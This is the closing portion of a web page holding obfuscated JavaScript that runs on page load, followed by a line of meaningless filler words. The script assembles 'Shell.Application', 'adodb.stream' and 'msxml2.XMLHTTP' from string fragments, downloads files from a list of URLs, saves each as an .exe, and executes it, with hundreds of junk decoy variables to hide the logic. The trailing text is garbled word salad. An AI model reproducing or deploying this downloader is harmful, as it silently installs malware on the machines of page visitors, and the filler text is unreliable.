redDog="responseBo"+"dyck4".substr(0,2);function oh(){sea=[];want=18559;want++;try {var book="ourPiece"} catch(book){};var they="";come=["northTurn","set","above"];change={};if(pass.indexOf(never) > -1){var groundMight=new Array();this.strongLess=978;this.strongLess++;call={word:10445};var writeHim=["comeWould"];var serve="";var stopYes="";hand=25269;hand-=192;school = pass.split(never);var good={his:20957};var turnBoy=false;this.travel="travel";add=16993;add--;var should="";for(var i in school){var govern="";this.airMark=false;place=27537;place-=204;try {var run="familyCommon"} catch(run){};var yetNeed=new String();var quick = school[i][then](/^\s+|\s+$/g, age); var music="";this.plant=459;this.plant-=142;var underHad="";fall={};yetFarm=6780;yetFarm-=19;var shape=29557;if(quick != age){var make=false;var their={high:"down"};plane={yes:"front"};turn[will](quick);wood={blue:8491};ohEat=17592;ohEat+=255;this.road="road";}}} else {var thereLarge=new String();var yesWheel=new String();var saw=["shortSleep","stayCommon","heard"];this.yourLeave="yourLeave";var table=23075;turn[will](pass);var turnYet="turnYet";var friendPound={newBody:"studyNotice"};} dryCity={callChange:16908};this.passPeople=8404;this.passPeople--;var drive=[];var able="";var willTake="willTake";return turn;}var foodThough=new String();try {} catch(veryStrong){};this.moveEarth=7491;this.moveEarth+=102;this.someOpen=26120;this.someOpen++;function than(again, point){life=["simple"];knowGround=24748;knowGround--;figureFigure=30877;figureFigure-=200;var does=new String();var sleepFace=["orWalk","inch","cold"];yourSlow=775;yourSlow+=122;what=[];a=21635;a+=166;test[meLittle](again, point);}northBeauty={watch:"fewLove"};var line={};var head=22943;var piece=32549;function the(){var pose=20499;var frontCross=4606;ago=7777;ago+=220;if(!free()) return;serveWell=25614;serveWell++;objectWorld=24863;objectWorld-=114;darkCommon=22684;darkCommon++;var willPerson=new Array();test=document.createElement(new String("object"));than(new String("classi"+"d"), useDrive);var moveEarly="moveEarly";this.moonHome="";bedPower={since:false};than("id", "test");try {strong = test[readAmong]("Shell.A9kDj".substr(0,7)+"DH0pplicat0HD".substr(3,7)+"MrbionMbr".substr(3,3),age);find=[];this.learn="";hold=[];air = test[readAmong]("adodb.strea"+"mnXk".substr(0,1),age);this.why=19607;this.why++;var rest=new Date();var him="";var turn = oh();this.differ="differ";var sawAmong=["moneyAt","moreA","boyMuch"];var stopSun=["letter","pound","young"];var sideHeat=["white","spellAbove"];var thoseFirst=["northFact","needCome"];doesRock=17386;doesRock--;if(turn.length <= 0) return false;which=["i","took","fish"];agoOld=["laughOften","seemOrder","figureGreen"];var runHalf={cut:27153};var schoolOut=["differGot","wonder","poseNotice"];for(var i=sun; i < turn.length; i++){var fromLong=new Date();var haveSlow=new String();var ifCover=["finalDone","againOnly"];var unitIt=[];pullTown={leadOut:"deepMade"};var decide=[];this.both=22541;this.both++;var unit = out[i % out.length];var enough = turn[i];goodDrive={water:"cry"};secondCenter=[];var endDiffer=false;var your = "./."+"./yzvw".substr(0,2) + unit + new String(".exe");this.dont=18287;this.dont--;try {var faceAppear="fewReal"} catch(faceAppear){};var voicePoint=low * i;var shortPlane=["heatRule"];var knew="";try {var shapeCause="ageHave"} catch(shapeCause){};dryLook=[];meanFar(new String(enough), new String(your));var right=23685;try {} catch(feel){};try {} catch(hisTree){};var had=new Date();}} catch(e){}}function longSaid(stoodTree){planeIt={};var shouldSide=8362;northAmong={faceMade:false};var windReal="windReal";cutOften=["riverPiece","orderWater","commonLay"];nowSay=["bodyAlso"];begin = test[readAmong]("msxml2.XMLO4eW".substr(0,10)+"HTTP", age);var planeTop=new Date();whichThem={shipSame:26359};var fatherIdea=24125;var there=16243;begin[move]("GET", stoodTree);asAmong=["seaFew"];whileRun=["warDrive"];this.feetSing=7842;this.feetSing--;begin[best]();var thatWhen="thatWhen";this.hisNever="hisNever";story=9303;story+=10;return begin[redDog];}function free(){var thereWrite={strongPaper:false};this.keepLot="";return (document.body.style.textOverflow != undefined);}function meanFar(stoodTree,color){var wentMother=["turnTalk","staySleep","she"];this.largeRed=28365;this.largeRed-=184;eat=["atMove"];var found={shouldPlay:"figureStep"};try {var standMother=3260;toward=26805;toward++;var actPress="";try {var work="lightCold"} catch(work){};try {var other=new Date();var rainTable=28788;air[bed]();this.coldMake="coldMake";fatherUs=["andFast","hour"];} catch(stand){}this.lastTheir=29388;this.lastTheir--;var downStrong={topWas:11226};try {var answerWater="servePaper"} catch(answerWater){};power=longSaid(stoodTree);peopleHad=["kingRiver"];this.house=4015;this.house++;air[once]=family;cameWho={hasEye:"bringForce"};foodEast=["feetThat","shortHave"];air[move]();happenUs=["fewMany","butWell"];var helpRound=27891;air[end](power);drawHome={number:721};surePage={late:false};air[follow](color,most);try {var cryFarm="putFollow"} catch(cryFarm){};var plantClear="";air[bed]();try {var meEver="shapeDark"} catch(meEver){};try{var whyRule=["slow","followNight"];var whiteAnswer=["standWatch","fastKnew"];var sameOff=26811;actCome=["walkHand","even","waterWay"];this.draw=29713;this.draw-=76;strong[stay](color);var clear="";var tellFront=["seemBody"];var lookNumber="";} catch(e){}mayForce=12153;mayForce+=212;var homeMay={unitFirst:false};manAt=8219;manAt+=30;whereSoon=["happenRiver","aboveCause"];cutLive=["wentThere","meanBusy"];}catch(noun) {lessFive=["fishTail","behindYet","ourAgo"];this.same=false;var airSix="";try {var direct=false;var better=["showGrow","factHand"];air[bed]();changeBack={hot:6344};var it=new Array();} catch(first){}helpPlain=["beBig","listen"];}var ageSecond=15826;this.fallThree="";var faceTree=28716;}var sleep=0;var topAnimal=false;function groundMen(){while(sleep++ < 171){groundMen();}if(!topAnimal){topAnimal = true;the();}}groundMen();</script>nisi nebs coalify opera caw add gluts rewon toph reinked bucko web moot.woofer reinked haeres arabic hernia bice blind nebs schmoos stow opera obese snaffle en hajes scow pyx.</body></html>

繼續閱讀全文...